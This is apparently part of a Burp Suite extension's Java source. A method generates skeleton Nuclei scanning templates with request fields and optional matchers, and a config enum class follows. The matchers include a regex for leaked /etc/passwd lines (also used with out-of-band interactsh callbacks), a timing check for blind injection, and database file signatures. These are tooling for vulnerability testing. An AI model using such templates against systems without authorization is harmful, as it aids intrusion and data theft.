Yaml_Gen(String TP_Id, String TP_Name, String TP_Author, String TP_Description, String TP_Tags, String TP_IsRedirect, String TP_Redirect_Num, String TP_Req, String TP_Path, String TP_Header, String TP_Body, String Tp_Severity) { 818 | String data = ""; 819 | 820 | //图省事,直接修改此处,硬编码metadata字段 821 | String id_info = "id: %s\n\n" + 822 | "info:\n" + 823 | " name: %s\n" + 824 | " author: %s\n" + 825 | " severity: %s\n" + 826 | " description: |\n" + 827 | " %s\n" + 828 | " metadata:\n" + 829 | " fofa-query: \n" + 830 | " shodan-query: \n" + 831 | " hunter-query: \n" + 832 | " reference:\n" + 833 | " - https://\n" + 834 | " tags: %s\n\n"; 835 | data += String.format(id_info, TP_Id, TP_Name, TP_Author, Tp_Severity, TP_Description, TP_Tags); 836 | 837 | String raw_requests = "http:\n" + 838 | " - raw:\n" + 839 | " - |\n" + 840 | " POST %s HTTP/1.1\n" + 841 | " Host: {{Hostname}}\n" + 842 | " Content-Type: %s\n" + 843 | "\n" + 844 | " %s\n\n"; 845 | 846 | String requests = "http:\n" + 847 | " - method: %s\n" + 848 | " path:\n" + 849 | " - \"{{BaseURL}}%s\"\n\n"; 850 | 851 | String Header = " headers:\n" + 852 | " Content-Type: %s\n\n"; 853 | 854 | String Body = " body: |\n" + 855 | " 替换此处注意每行缩进\n\n"; 856 | 857 | String redirects = " host-redirects: true\n" + 858 | " max-redirects: %s\n\n"; 859 | 860 | String Matchers = " matchers-condition: and\n" + 861 | " matchers:\n"; 862 | 863 | String MatchersWord = " - type: word\n" + 864 | " part: body\n" + 865 | " words:\n" + 866 | " - 'test1'\n" + 867 | " - 'test2'\n" + 868 | " condition: or\n\n"; 869 | 870 | String MatchersHeader = " - type: word\n" + 871 | " part: header\n" + 872 | " words:\n" + 873 | " - 'tomcat'\n\n"; 874 | 875 | String MatchersStatus = " - type: status\n" + 876 | " status:\n" + 877 | " - 200\n\n"; 878 | 879 | String MatchersNegative = " - type: word\n" + 880 | " words:\n" + 881 | " - \"荣耀立方\"\n" + 882 | " - 'var model = \"LW-N605R\"'\n" + 883 | " part: body\n" + 884 | " negative: true\n" + 885 | " condition: or\n\n"; 886 | 887 | String MatchersTime = " - type: dsl\n" + 888 | " dsl:\n" + 889 | " - 'duration>=6'\n\n"; 890 | 891 | String MatchersSize = " - type: dsl\n" + 892 | " dsl:\n" + 893 | " - 'len(body)<130'\n\n"; 894 | 895 | String MatchersInteractsh_Protocol = " - type: word\n" + 896 | " part: interactsh_protocol # 配合 {{interactsh-url}} 关键词使用\n" + 897 | " words:\n" + 898 | " - \"http\"\n\n"; 899 | 900 | String MatchersInteractsh_Request = " - type: regex\n" + 901 | " part: interactsh_request # 配合 {{interactsh-url}} 关键词使用\n" + 902 | " regex:\n" + 903 | " - \"root:.*:0:0:\"\n\n"; 904 | 905 | String MatchersInteractsh_Regex = " - type: regex\n" + 906 | " regex:\n" + 907 | " - \"root:.*:0:0:\"\n" + 908 | " part: body\n\n"; 909 | 910 | String MatchersInteractsh_Binary = " - type: binary\n" + 911 | " binary:\n" + 912 | " - \"D0CF11E0\" # db\n" + 913 | " - \"53514C69746520\" # SQLite\n" + 914 | " part: body\n" + 915 | " condition: or\n\n"; 916 | 917 | String Extractors = " extractors:\n" + 918 | " - part: header\n" + 919 | " internal: true\n" + 920 | " group: 1\n" + 921 | " type: regex\n" + 922 | " regex:\n" + 923 | " - 'Set-Cookie: PHPSESSID=(.*); path=/'\n\n"; 924 | 925 | if (TP_Req == "RAW") { 926 | if (TP_Header == "urlencoded") { 927 | TP_Header = "application/x-www-form-urlencoded"; 928 | } else if (TP_Header == "json") { 929 | TP_Header = "application/json"; 930 | } 931 | 932 | if (TP_Body == "带") { 933 | TP_Body = "替换此处"; 934 | } else if (TP_Body == "不带") { 935 | TP_Body = ""; 936 | } 937 | 938 | data += String.format(raw_requests, TP_Path, TP_Header, TP_Body); 939 | } else { 940 | data += String.format(requests, TP_Req, TP_Path); 941 | if (TP_Header == "urlencoded") { 942 | data += String.format(Header, "application/x-www-form-urlencoded"); 943 | } else if (TP_Header == "json") { 944 | data += String.format(Header, "application/json"); 945 | } else if (TP_Header == "xml") { 946 | data += String.format(Header, "text/xml"); 947 | } 948 | 949 | if (!Objects.equals(TP_Body, "不带")) { 950 | data += String.format(Body, TP_Body); 951 | } 952 | } 953 | 954 | if (TP_IsRedirect == "istrue") { 955 | data += String.format(redirects, TP_Redirect_Num); 956 | } 957 | 958 | if (match_true) { 959 | data += Matchers; 960 | } 961 | if (match_word) { 962 | data += MatchersWord; 963 | } 964 | if (match_header) { 965 | data += MatchersHeader; 966 | } 967 | if (match_status) { 968 | data += MatchersStatus; 969 | } 970 | if (match_negative) { 971 | data += MatchersNegative; 972 | } 973 | if (match_time) { 974 | data += MatchersTime; 975 | } 976 | if (match_size) { 977 | data += MatchersSize; 978 | } 979 | if (match_interactsh_protocol) { 980 | data += MatchersInteractsh_Protocol; 981 | } 982 | if (match_interactsh_request) { 983 | data += MatchersInteractsh_Request; 984 | } 985 | if (match_regex) { 986 | data += MatchersInteractsh_Regex; 987 | } 988 | if (match_binary) { 989 | data += MatchersInteractsh_Binary; 990 | } 991 | 992 | if (extractors) { 993 | data += Extractors; 994 | } 995 | 996 | return data; 997 | 998 | } 999 | 1000 | } 1001 | -------------------------------------------------------------------------------- /src/main/java/burp/utils/Config.java: -------------------------------------------------------------------------------- 1 | package burp.utils; 2 | 3 | public class Config { 4 | 5 | public enum RedirectsMode { 6 | istrue, isfalse 7 | } 8 | 9 | public enum ContentTypeMode { 10 | 不使用,urlencoded, json,xml 11 | } 12 | 13 | public enum ContentBodyMode { 14 | 不带,带 15 | } 16 | 17 | public enum severityMode { 18 | info,low,medium,high,critical 19 | } 20 | 21 | public enum reqMode { 22 | GET,POST,RAW,PUT,OPTIONS,TRACE 23 | } 24 | 25 | } 26 | --------------------------------------------------------------------------------